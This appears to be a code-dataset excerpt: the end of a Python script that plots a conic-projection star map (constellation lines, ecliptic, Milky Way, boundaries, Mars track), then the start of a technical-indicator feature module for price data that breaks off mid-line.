plt.plot([grid_dec.x[k],grid_dec.x[k+1]],[grid_dec.y[k],grid_dec.y[k+1]],color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n \r\n #plt.plot(grid_dec.x,grid_dec.y,color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n\r\n\r\nfor i in range(12):\r\n\r\n plt.plot([transform_x_conic(30*i,90),transform_x_conic(30*i,-90)],[transform_y_conic(30*i,90),transform_y_conic(30*i,-90)],color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n\r\n# equator\r\nfor i in range(360):\r\n equator_conic.loc[i] = [i,0,0,0]\r\n\r\nequator_conic.x = list(map(transform_x_conic, equator_conic.RA, equator_conic.Dec))\r\nequator_conic.y = list(map(transform_y_conic, equator_conic.RA, equator_conic.Dec))\r\n\r\nfor i in range(len(equator_conic)-1):\r\n if -1 < equator_conic.x[i]-equator_conic.x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([equator_conic.x[i],equator_conic.x[i+1]],[equator_conic.y[i],equator_conic.y[i+1]],'r-',alpha=plot_alpha,zorder=1)\r\n\r\n#plt.plot(equator_conic.x,equator_conic.y,'r-',alpha=plot_alpha,zorder=1)\r\n\r\n# ecliptic\r\nepsilon_J2000 = 23.4392911\r\nfor i in range(360):\r\n ecliptic_conic.loc[i] = [math.degrees(math.atan2(math.sin(math.radians(i))*math.cos(math.radians(epsilon_J2000)),math.cos(math.radians(i)))),\r\n math.degrees(math.asin(math.sin(math.radians(epsilon_J2000))*math.sin(math.radians(i)))),0,0]\r\n\r\necliptic_conic.x = list(map(transform_x_conic, ecliptic_conic.RA, ecliptic_conic.Dec))\r\necliptic_conic.y = list(map(transform_y_conic, ecliptic_conic.RA, ecliptic_conic.Dec))\r\n\r\nfor i in range(len(ecliptic_conic)-1):\r\n if -1 < ecliptic_conic.x[i]-ecliptic_conic.x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([ecliptic_conic.x[i],ecliptic_conic.x[i+1]],[ecliptic_conic.y[i],ecliptic_conic.y[i+1]],'y-',alpha=plot_alpha+0.1,zorder=1)\r\n\r\n#plt.plot(ecliptic_conic.x,ecliptic_conic.y,'y-',alpha=plot_alpha+0.1,zorder=1)\r\n\r\n# constellations\r\nfor df in constellation_list:\r\n df.x = list(map(transform_x_conic, df.RA, df.Dec))\r\n df.y = list(map(transform_y_conic, df.RA, df.Dec)) # may then be overwritten by transform_po results\r\n\r\nconstellation_star_conic = [[And.x,And.y,And.mag],[Ant.x,Ant.y,Ant.mag],[Aps.x,Aps.y,Aps.mag],[Aqr.x,Aqr.y,Aqr.mag],\r\n [Aql.x,Aql.y,Aql.mag],[Ara.x,Ara.y,Ara.mag],[Ari.x,Ari.y,Ari.mag],[Aur.x,Aur.y,Aur.mag],\r\n [Boo.x,Boo.y,Boo.mag],[Cae.x,Cae.y,Cae.mag],[Cam.x,Cam.y,Cam.mag],[Cnc.x,Cnc.y,Cnc.mag],\r\n [CVn.x,CVn.y,CVn.mag],[CMa.x,CMa.y,CMa.mag],[CMi.x,CMi.y,CMi.mag],[Cap.x,Cap.y,Cap.mag],\r\n [Car.x,Car.y,Car.mag],[Cas.x,Cas.y,Cas.mag],[Cen.x,Cen.y,Cen.mag],[Cep.x,Cep.y,Cep.mag],\r\n [Cet.x,Cet.y,Cet.mag],[Cha.x,Cha.y,Cha.mag],[Cir.x,Cir.y,Cir.mag],[Col.x,Col.y,Col.mag],\r\n [Com.x,Com.y,Com.mag],[CrA.x,CrA.y,CrA.mag],[CrB.x,CrB.y,CrB.mag],[Crv.x,Crv.y,Crv.mag],\r\n [Crt.x,Crt.y,Crt.mag],[Cru.x,Cru.y,Cru.mag],[Cyg.x,Cyg.y,Cyg.mag],[Del.x,Del.y,Del.mag],\r\n [Dor.x,Dor.y,Dor.mag],[Dra.x,Dra.y,Dra.mag],[Equ.x,Equ.y,Equ.mag],[Eri.x,Eri.y,Eri.mag],\r\n [For.x,For.y,For.mag],[Gem.x,Gem.y,Gem.mag],[Gru.x,Gru.y,Gru.mag],[Her.x,Her.y,Her.mag],\r\n [Hor.x,Hor.y,Hor.mag],[Hya.x,Hya.y,Hya.mag],[Hyi.x,Hyi.y,Hyi.mag],[Ind.x,Ind.y,Ind.mag],\r\n [Lac.x,Lac.y,Lac.mag],[Leo.x,Leo.y,Leo.mag],[LMi.x,LMi.y,LMi.mag],[Lep.x,Lep.y,Lep.mag],\r\n [Lib.x,Lib.y,Lib.mag],[Lup.x,Lup.y,Lup.mag],[Lyn.x,Lyn.y,Lyn.mag],[Lyr.x,Lyr.y,Lyr.mag],\r\n [Men.x,Men.y,Men.mag],[Mic.x,Mic.y,Mic.mag],[Mon.x,Mon.y,Mon.mag],[Mus.x,Mus.y,Mus.mag],\r\n [Nor.x,Nor.y,Nor.mag],[Oct.x,Oct.y,Oct.mag],[Oph.x,Oph.y,Oph.mag],[Ori.x,Ori.y,Ori.mag],\r\n 
[Pav.x,Pav.y,Pav.mag],[Peg.x,Peg.y,Peg.mag],[Per.x,Per.y,Per.mag],[Phe.x,Phe.y,Phe.mag],\r\n [Pic.x,Pic.y,Pic.mag],[Psc.x,Psc.y,Psc.mag],[PsA.x,PsA.y,PsA.mag],[Pup.x,Pup.y,Pup.mag],\r\n [Pyx.x,Pyx.y,Pyx.mag],[Ret.x,Ret.y,Ret.mag],[Sge.x,Sge.y,Sge.mag],[Sgr.x,Sgr.y,Sgr.mag],\r\n [Sco.x,Sco.y,Sco.mag],[Scl.x,Scl.y,Scl.mag],[Sct.x,Sct.y,Sct.mag],[Ser.x,Ser.y,Ser.mag],\r\n [Sex.x,Sex.y,Sex.mag],[Tau.x,Tau.y,Tau.mag],[Tel.x,Tel.y,Tel.mag],[Tri.x,Tri.y,Tri.mag],\r\n [TrA.x,TrA.y,TrA.mag],[Tuc.x,Tuc.y,Tuc.mag],[UMa.x,UMa.y,UMa.mag],[UMi.x,UMi.y,UMi.mag],\r\n [Vel.x,Vel.y,Vel.mag],[Vir.x,Vir.y,Vir.mag],[Vol.x,Vol.y,Vol.mag],[Vul.x,Vul.y,Vul.mag]]\r\n\r\nfor x,y,z in constellation_star_conic:\r\n for j in range(len(x)):\r\n if z[j] <= mag_lim:\r\n plt.scatter(x[j],y[j], s=15*(10**(-0.4*z[j]))**0.5, c='white', alpha=plot_alpha, zorder=2)\r\n plt.scatter(x[j]-360,y[j], s=15*(10**(-0.4*z[j]))**0.5, c='white', alpha=plot_alpha, zorder=2)\r\n\r\nconstellation_line_conic = [[And.x,And.y,And_line,'And'],[Ant.x,Ant.y,Ant_line,'Ant'],[Aps.x,Aps.y,Aps_line,'Aps'],[Aqr.x,Aqr.y,Aqr_line,'$\\u2652$'],\r\n [Aql.x,Aql.y,Aql_line,'Aql'],[Ara.x,Ara.y,Ara_line,'Ara'],[Ari.x,Ari.y,Ari_line,'$\\u2648$'],[Aur.x,Aur.y,Aur_line,'Aur'],\r\n [Boo.x,Boo.y,Boo_line,'Boo'],[Cae.x,Cae.y,Cae_line,'Cae'],[Cam.x,Cam.y,Cam_line,'Cam'],[Cnc.x,Cnc.y,Cnc_line,'$\\u264B$'],\r\n [CVn.x,CVn.y,CVn_line,'CVn'],[CMa.x,CMa.y,CMa_line,'CMa'],[CMi.x,CMi.y,CMi_line,'CMi'],[Cap.x,Cap.y,Cap_line,'$\\u2651$'],\r\n [Car.x,Car.y,Car_line,'Car'],[Cas.x,Cas.y,Cas_line,'Cas'],[Cen.x,Cen.y,Cen_line,'Cen'],[Cep.x,Cep.y,Cep_line,'Cep'],\r\n [Cet.x,Cet.y,Cet_line,'Cet'],[Cha.x,Cha.y,Cha_line,'Cha'],[Cir.x,Cir.y,Cir_line,'Cir'],[Col.x,Col.y,Col_line,'Col'],\r\n [Com.x,Com.y,Com_line,'Com'],[CrA.x,CrA.y,CrA_line,'CrA'],[CrB.x,CrB.y,CrB_line,'CrB'],[Crv.x,Crv.y,Crv_line,'Crv'],\r\n [Crt.x,Crt.y,Crt_line,'Crt'],[Cru.x,Cru.y,Cru_line,'Cru'],[Cyg.x,Cyg.y,Cyg_line,'Cyg'],[Del.x,Del.y,Del_line,'Del'],\r\n [Dor.x,Dor.y,Dor_line,'Dor'],[Dra.x,Dra.y,Dra_line,'Dra'],[Equ.x,Equ.y,Equ_line,'Equ'],[Eri.x,Eri.y,Eri_line,'Eri'],\r\n [For.x,For.y,For_line,'For'],[Gem.x,Gem.y,Gem_line,'$\\u264A$'],[Gru.x,Gru.y,Gru_line,'Gru'],[Her.x,Her.y,Her_line,'Her'],\r\n [Hor.x,Hor.y,Hor_line,'Hor'],[Hya.x,Hya.y,Hya_line,'Hya'],[Hyi.x,Hyi.y,Hyi_line,'Hyi'],[Ind.x,Ind.y,Ind_line,'Ind'],\r\n [Lac.x,Lac.y,Lac_line,'Lac'],[Leo.x,Leo.y,Leo_line,'$\\u264C$'],[LMi.x,LMi.y,LMi_line,'LMi'],[Lep.x,Lep.y,Lep_line,'Lep'],\r\n [Lib.x,Lib.y,Lib_line,'$\\u264E$'],[Lup.x,Lup.y,Lup_line,'Lup'],[Lyn.x,Lyn.y,Lyn_line,'Lyn'],[Lyr.x,Lyr.y,Lyr_line,'Lyr'],\r\n [Men.x,Men.y,Men_line,'Men'],[Mic.x,Mic.y,Mic_line,'Mic'],[Mon.x,Mon.y,Mon_line,'Mon'],[Mus.x,Mus.y,Mus_line,'Mus'],\r\n [Nor.x,Nor.y,Nor_line,'Nor'],[Oct.x,Oct.y,Oct_line,'Oct'],[Oph.x,Oph.y,Oph_line,'Oph'],[Ori.x,Ori.y,Ori_line,'Ori'],\r\n [Pav.x,Pav.y,Pav_line,'Pav'],[Peg.x,Peg.y,Peg_line,'Peg'],[Per.x,Per.y,Per_line,'Per'],[Phe.x,Phe.y,Phe_line,'Phe'],\r\n [Pic.x,Pic.y,Pic_line,'Pic'],[Psc.x,Psc.y,Psc_line,'$\\u2653$'],[PsA.x,PsA.y,PsA_line,'PsA'],[Pup.x,Pup.y,Pup_line,'Pup'],\r\n [Pyx.x,Pyx.y,Pyx_line,'Pyx'],[Ret.x,Ret.y,Ret_line,'Ret'],[Sge.x,Sge.y,Sge_line,'Sge'],[Sgr.x,Sgr.y,Sgr_line,'$\\u2650$'],\r\n [Sco.x,Sco.y,Sco_line,'$\\u264F$'],[Scl.x,Scl.y,Scl_line,'Scl'],[Sct.x,Sct.y,Sct_line,'Sct'],[Ser.x,Ser.y,Ser_line,'Ser'],\r\n [Sex.x,Sex.y,Sex_line,'Sex'],[Tau.x,Tau.y,Tau_line,'$\\u2649$'],[Tel.x,Tel.y,Tel_line,'Tel'],[Tri.x,Tri.y,Tri_line,'Tri'],\r\n 
[TrA.x,TrA.y,TrA_line,'TrA'],[Tuc.x,Tuc.y,Tuc_line,'Tuc'],[UMa.x,UMa.y,UMa_line,'UMa'],[UMi.x,UMi.y,UMi_line,'UMi'],\r\n [Vel.x,Vel.y,Vel_line,'Vel'],[Vir.x,Vir.y,Vir_line,'$\\u264D$'],[Vol.x,Vol.y,Vol_line,'Vol'],[Vul.x,Vul.y,Vul_line,'Vul']]\r\n\r\n# constellation linecollection\r\nconstellation_line_z_xy1_conic = [] # (x,y) pair of vertics 1\r\nconstellation_line_z_xy2_conic = [] # (x,y) pair of vertics 2\r\nconstellation_line_xy1_conic = []\r\nconstellation_line_xy2_conic = []\r\nfor i in range(len(constellation_line_conic)):\r\n for j in range(len(constellation_line_conic[i][2])):\r\n if constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]-constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] > hori_border_conic/2:\r\n constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]] = numpy.nan #unconnect astray pts\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n elif constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]-constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] < -hori_border_conic/2:\r\n constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] = numpy.nan #unconnect astray pts\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n 
else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n\r\nconstellation_line_z_list_conic = zip(constellation_line_z_xy1_conic,constellation_line_z_xy2_conic)\r\nconstellation_line_list_conic = zip(constellation_line_xy1_conic,constellation_line_xy2_conic)\r\n\r\nlc_west_z_conic = mc.LineCollection(constellation_line_z_list_conic, colors='yellow', zorder=10+2.5)\r\nlc_west_conic = mc.LineCollection(constellation_line_list_conic, colors='white', zorder=10+2.5)\r\nlc_west_z_conic.set_alpha(plot_alpha)\r\nlc_west_conic.set_alpha(plot_alpha)\r\nax0.add_collection(lc_west_z_conic)\r\nax0.add_collection(lc_west_conic)\r\n\r\n# others linecollection\r\nconstellation_dotted_line_conic = [[(Aur.x[3],Aur.y[3]),(Tau.x[1],Tau.y[1])],[(Aur.x[2],Aur.y[2]),(Tau.x[1],Tau.y[1])],\r\n [(Peg.x[1],Peg.y[1]),(And.x[0],And.y[0])],[(Peg.x[3],Peg.y[3]),(And.x[0],And.y[0])],\r\n [(Ser.x[3],Ser.y[3]),(Oph.x[7],Oph.y[7])],[(Ser.x[2],Ser.y[2]),(Oph.x[3],Oph.y[3])],\r\n [(PsA.x[0],PsA.y[0]),(Aqr.x[18],Aqr.y[18])]]\r\n\r\nconstellation_dotted_line_list_conic = []\r\nfor i in range(len(constellation_dotted_line_conic)):\r\n if constellation_dotted_line_conic[i][0][0]-constellation_dotted_line_conic[i][1][0] > hori_border_conic/2:\r\n constellation_dotted_line_list_conic.append(((constellation_dotted_line_conic[i][0][0]-360,constellation_dotted_line_conic[i][0][1]),constellation_dotted_line_conic[i][1]))\r\n constellation_dotted_line_list_conic.append((constellation_dotted_line_conic[i][0],(constellation_dotted_line_conic[i][1][0]+360,constellation_dotted_line_conic[i][1][1])))\r\n elif constellation_dotted_line_conic[i][0][0]-constellation_dotted_line_conic[i][1][0] < -hori_border_conic/2:\r\n constellation_dotted_line_list_conic.append(((constellation_dotted_line_conic[i][0][0]+360,constellation_dotted_line_conic[i][0][1]),constellation_dotted_line_conic[i][1]))\r\n 
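# also append the mirror copy shifted -360 so the dashed segment shows on both sides of the RA seam\r\n 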
constellation_dotted_line_list_conic.append((constellation_dotted_line_conic[i][0],(constellation_dotted_line_conic[i][1][0]-360,constellation_dotted_line_conic[i][1][1])))\r\n else:\r\n constellation_dotted_line_list_conic.append(constellation_dotted_line_conic[i])\r\n\r\nlc_west_dotted_conic = mc.LineCollection(constellation_dotted_line_list_conic, colors='white', linestyles='dashed',zorder=10+2.5)\r\nlc_west_dotted_conic.set_alpha(plot_alpha)\r\nax0.add_collection(lc_west_dotted_conic)\r\n\r\n# annotation\r\nif annotation_on == 1:\r\n for x,y,z,n in constellation_line_conic:\r\n if n in set(['$\\u2652$','$\\u2648$','$\\u264B$','$\\u2651$','$\\u264A$','$\\u264C$','$\\u264E$','$\\u2653$','$\\u2650$','$\\u264F$','$\\u2649$','$\\u264D$']):\r\n ax0.annotate(str(n),(numpy.mean(x),numpy.mean(y)-labelxy),color='y')\r\n else:\r\n ax0.annotate(str(n),(numpy.mean(x),numpy.mean(y)-labelxy),color='w')\r\n\r\n# milkyway\r\nMW_line_list_conic = []\r\nfor df in MW_list:\r\n df.x = list(map(transform_x_conic, df.RA, df.Dec))\r\n df.y = list(map(transform_y_conic, df.RA, df.Dec))\r\n for i in range(len(df)-1):\r\n if df.x[i]-df.x[i+1] > hori_border_conic/2:\r\n df.x[i] = numpy.nan\r\n MW_line_list_conic.append([(df.x[i]-360,df.y[i]),(df.x[i+1],df.y[i+1])])\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1]+360,df.y[i+1])])\r\n elif df.x[i]-df.x[i+1] < -hori_border_conic/2:\r\n df.x[i+1] = numpy.nan\r\n MW_line_list_conic.append([(df.x[i]+360,df.y[i]),(df.x[i+1],df.y[i+1])])\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1]-360,df.y[i+1])])\r\n else:\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1],df.y[i+1])])\r\n\r\nlc_MW_conic = mc.LineCollection(MW_line_list_conic, colors='b',alpha=plot_alpha, zorder=1+2.5)\r\nax0.add_collection(lc_MW_conic)\r\n\r\n# boundary\r\nboundary.x = list(map(transform_x_conic, boundary.RA*15, boundary.Dec)) #convert RA to degrees\r\nboundary.y = list(map(transform_y_conic, boundary.RA*15, boundary.Dec))\r\n\r\nboundary_line_list_conic = []\r\nfor i in range(len(boundary)-1):\r\n if boundary.Constellation[i] == boundary.Constellation[i+1]:\r\n if boundary.x[i]-boundary.x[i+1] > hori_border_conic/2:\r\n boundary.x[i] = numpy.nan\r\n boundary_line_list_conic.append([(boundary.x[i]-360,boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1]+360,boundary.y[i+1])])\r\n elif boundary.x[i]-boundary.x[i+1] < -hori_border_conic/2:\r\n boundary.x[i+1] = numpy.nan\r\n boundary_line_list_conic.append([(boundary.x[i]+360,boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1]-360,boundary.y[i+1])])\r\n else:\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n\r\nlc_boundary_conic = mc.LineCollection(boundary_line_list_conic, colors=[1,0.5,0,0.15],alpha=plot_alpha/4, zorder=1+2.5)\r\nax0.add_collection(lc_boundary_conic)\r\n\r\n#Mars\r\nDT_UTC = ts.utc(2019,12,range(31,31+365*2),16,0,0)\r\nDT_HK = DT_UTC.astimezone(tz)\r\n\r\nmra,mdec,mau = (earth+hokoon[0]).at(DT_UTC).observe(mars).radec()\r\n\r\nmars_x = list(map(transform_x_conic, mra.hours*15, mdec.degrees))\r\nmars_y = list(map(transform_y_conic, mra.hours*15, mdec.degrees))\r\n\r\nfor i in range(len(mau.au)-1):\r\n if -1 < mars_x[i]-mars_x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([mars_x[i],mars_x[i+1]],[mars_y[i],mars_y[i+1]],'g-',zorder=1)\r\n 
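# segments longer than the inner-circle diameter straddle the RA wrap, so the check above skips them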
\r\n#plt.plot(mars_x,mars_y,'g-',zorder=1)\r\n\r\nfor i in range(17):\r\n plt.scatter(mars_x[279+i*5],mars_y[279+i*5])\r\n\r\n##DD = 279\r\n##print(DT_HK[DD],DT_HK[DD+5],DT_HK[DD+10],DT_HK[DD+15],DT_HK[DD+20],DT_HK[DD+25],DT_HK[DD+30],DT_HK[DD+35],DT_HK[DD+40],\r\n## DT_HK[DD+45],DT_HK[DD+50],DT_HK[DD+55],DT_HK[DD+60],DT_HK[DD+65],DT_HK[DD+70],DT_HK[DD+75],DT_HK[DD+80],DT_HK[DD+85])\r\n#plt.savefig('destination_path.eps', format='eps')\r\nplt.show()\r\n\r\n","sub_path":"skymap_conic.py","file_name":"skymap_conic.py","file_ext":"py","file_size_in_byte":42657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"377122815","text":"import math\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom IPython import embed\nimport random\nimport itertools\nimport talib as ta\n\nNON_NORMALIZE_COLUMNS = ['open', 'high', 'low', 'close', 'volume', 'flag']\n\n\ndef generate_data(args, df, delay, tick, flag_threshold, df_original=None):\n df = fix_error_row(df)\n df = calc_flag(df, delay, flag_threshold)\n df = calc_technicals(args, df, tick)\n df = calc_volume_technicals(args, df, tick)\n df = clip_outlier(args, df)\n df, df_real_price = add_change_rate(args, df)\n df = normalize_technicals(df)\n df = drop_unnecessary_columns(df)\n df = move_obj_value_to_tail(df)\n df = delete_correlate_columns(args, df, df_original)\n return df, df_real_price\n\n\ndef delete_correlate_columns(args, df, df_original):\n if args['delete_correlate_columns']:\n if df_original is None:\n df_corr = df.iloc[:, :-1].corr()\n df_not_correlated = ~(df_corr.mask(np.tril(np.ones([len(df_corr)]*2, dtype=bool))).abs() > args['delete_correlate_columns']).any()\n un_corr_idx = df_not_correlated.loc[df_not_correlated[df_not_correlated.index] == True].index\n df_out = df.iloc[:, :-1][un_corr_idx]\n return pd.concat([df_out, df.iloc[:, -1]], axis=1)\n else:\n columns = list(df_original.columns)\n columns.remove('adf flag')\n return pd.concat([df[columns], df.iloc[:, -1]], axis=1)\n else:\n return df\n\n\ndef move_obj_value_to_tail(df):\n df['adf flag'] = df['flag'].copy()\n df.drop(['flag'], 1, inplace=True)\n return df\n\n\ndef drop_unnecessary_columns(df):\n df.drop(['open', 'high', 'low', 'close', 'volume'], 1, inplace=True)\n return df\n\n\ndef normalize_technicals(df):\n min_max_scaler = preprocessing.MinMaxScaler()\n\n for column_name, item in df.iteritems():\n if column_name in NON_NORMALIZE_COLUMNS:\n continue\n df[column_name] = min_max_scaler.fit_transform(df[column_name].values.reshape(-1,1))\n\n return df\n\n\ndef add_change_rate(args, df):\n df_real_price = df.copy()\n\n prev_close = df['close'].shift(1)\n df['close_change_rate'] = df['close']\n df['close_change_rate'] /= prev_close\n\n prev_volume = df['volume'].shift(1)\n df['volume_change_rate'] = df['volume']\n df['volume_change_rate'] /= prev_volume\n\n df.replace([np.inf, -np.inf], np.nan, inplace=True)\n df.fillna(0, inplace=True)\n return df, df_real_price\n\n\ndef clip_outlier(args, df):\n threshold = args['threshold_outlier']\n for column_name, item in df.iteritems():\n if column_name in NON_NORMALIZE_COLUMNS:\n continue\n lower, upper = np.percentile(df[column_name].values,\n [threshold, 100 - threshold])\n df[column_name] = df[column_name].clip(lower, upper)\n\n return df\n\n\ndef calc_volume_technicals(args, df, tick):\n tick_seconds = tick * 60\n\n ## MovingAverage(Daily)\n MA3 = df.volume.rolling(window=3*60//tick*24).mean()\n MA5 = df.volume.rolling(window=5*60//tick*24).mean()\n 
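# rolling window = days * (60//tick bars per hour) * 24 hours; e.g. tick=5 gives 3*12*24 = 864 bars for the 3-day MA\n 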
MA10 = df.volume.rolling(window=10*60//tick*24).mean()\n MA25 = df.volume.rolling(window=25*60//tick*24).mean()\n df['vol_3MA_diff_percent_day'] = (MA3 - df['volume']) / df['volume']\n df['vol_5MA_diff_percent_day'] = (MA5 - df['volume']) / df['volume']\n df['vol_10MA_diff_percent_day'] = (MA10 - df['volume']) / df['volume']\n df['vol_25MA_diff_percent_day'] = (MA25 - df['volume']) / df['volume']\n\n df['vol_3MA_5MA_diff_day'] = df['vol_3MA_diff_percent_day'] - df['vol_5MA_diff_percent_day']\n df['vol_5MA_10MA_diff_day'] = df['vol_5MA_diff_percent_day'] - df['vol_10MA_diff_percent_day']\n df['vol_5MA_25MA_diff_day'] = df['vol_5MA_diff_percent_day'] - df['vol_25MA_diff_percent_day']\n df.fillna(0, inplace=True)\n\n return df\n\n\ndef calc_technicals(args, df, tick):\n tick_seconds = tick * 60\n open = np.array(df.open, dtype='f8')\n high = np.array(df.high, dtype='f8')\n low = np.array(df.low, dtype='f8')\n close = np.array(df.close, dtype='f8')\n volume = np.array(df.volume, dtype='f8')\n\n day_of_week = df.index.map(lambda x: x.weekday())\n df['day_of_week_sin'] = day_of_week.map(lambda x: math.sin(math.radians(x/7*360)))\n df['day_of_week_cos'] = day_of_week.map(lambda x: math.cos(math.radians(x/7*360)))\n\n df['high_low'] = df['high'] - df['low']\n df['high_low'] /= df['close']\n df['open_low'] = df['open'] - df['low']\n df['open_low'] /= df['close']\n df['open_high'] = df['open'] - df['high']\n df['open_high'] /= df['close']\n\n #################### MovingAverage\n ## Daily\n for i in [3, 5, 10, 25, 75, 200]:\n sma = ta.SMA(close, timeperiod=i*60//tick*24)\n df[str(i) + 'MA_diff_percent_day'] = (sma - df['close']) / df['close']\n\n for i, j in itertools.combinations([3, 5, 10, 25], 2):\n new_column = str(i) + 'MA_' + str(j) + 'MA_diff_day'\n column_1 = str(i) + 'MA_diff_percent_day'\n column_2 = str(j) + 'MA_diff_percent_day'\n df[new_column] = df[column_1] - df[column_2]\n for k in range(1, 2): # 3 would probably work too, but it makes little difference\n new_column_2 = str(i) + 'MA_' + str(j) + 'MA_diff_day_before' + str(k)\n df[new_column_2] = df[new_column].shift(k) - df[new_column]\n df.fillna(0, inplace=True)\n\n #################### Momentum\n ## Momentum\n for i in [3, 5, 10, 20]:\n Mom_period = i * 60 // tick * 24\n shift = df.close.shift(Mom_period)\n df['Mom' + str(i)] = df.close / shift * 100\n\n\n #################### Bollinger / MACD\n for i in [3, 9, 20, 25, 50]:\n base = df.close.rolling(window=i*60//tick*24).mean()\n sigma = df.close.rolling(window=i*60//tick*24).std(ddof=0)\n upper_1sigma = base + 1 * sigma\n lower_1sigma = base - 1 * sigma\n upper_2sigma = base + 2 * sigma\n lower_2sigma = base - 2 * sigma\n df[str(i) + 'MAbb_upper_1sigma_diff_percent'] = (upper_1sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_lower_1sigma_diff_percent'] = (lower_1sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_upper_2sigma_diff_percent'] = (upper_2sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_lower_2sigma_diff_percent'] = (lower_2sigma - df['close']) / df['close']\n\n ## MACD\n FastEMA_period = 12*60//tick*24\n SlowEMA_period = 26*60//tick*24\n SignalSMA_period = 9*60//tick*24\n df['MACD'] = df.close.ewm(span=FastEMA_period).mean() - df.close.ewm(span=SlowEMA_period).mean()\n df['Signal'] = df['MACD'].rolling(window=SignalSMA_period).mean()\n df['MACD_Signal_diff'] = df['MACD'] - df['Signal']\n\n #################### RSI / HLBand / Stoch\n ## RSI\n for i in [5, 10, 14, 30]:\n RSI_period = i*60//tick*24\n one_day_before = 1*60//tick*24\n diff = df.close.diff(one_day_before)\n positive = 
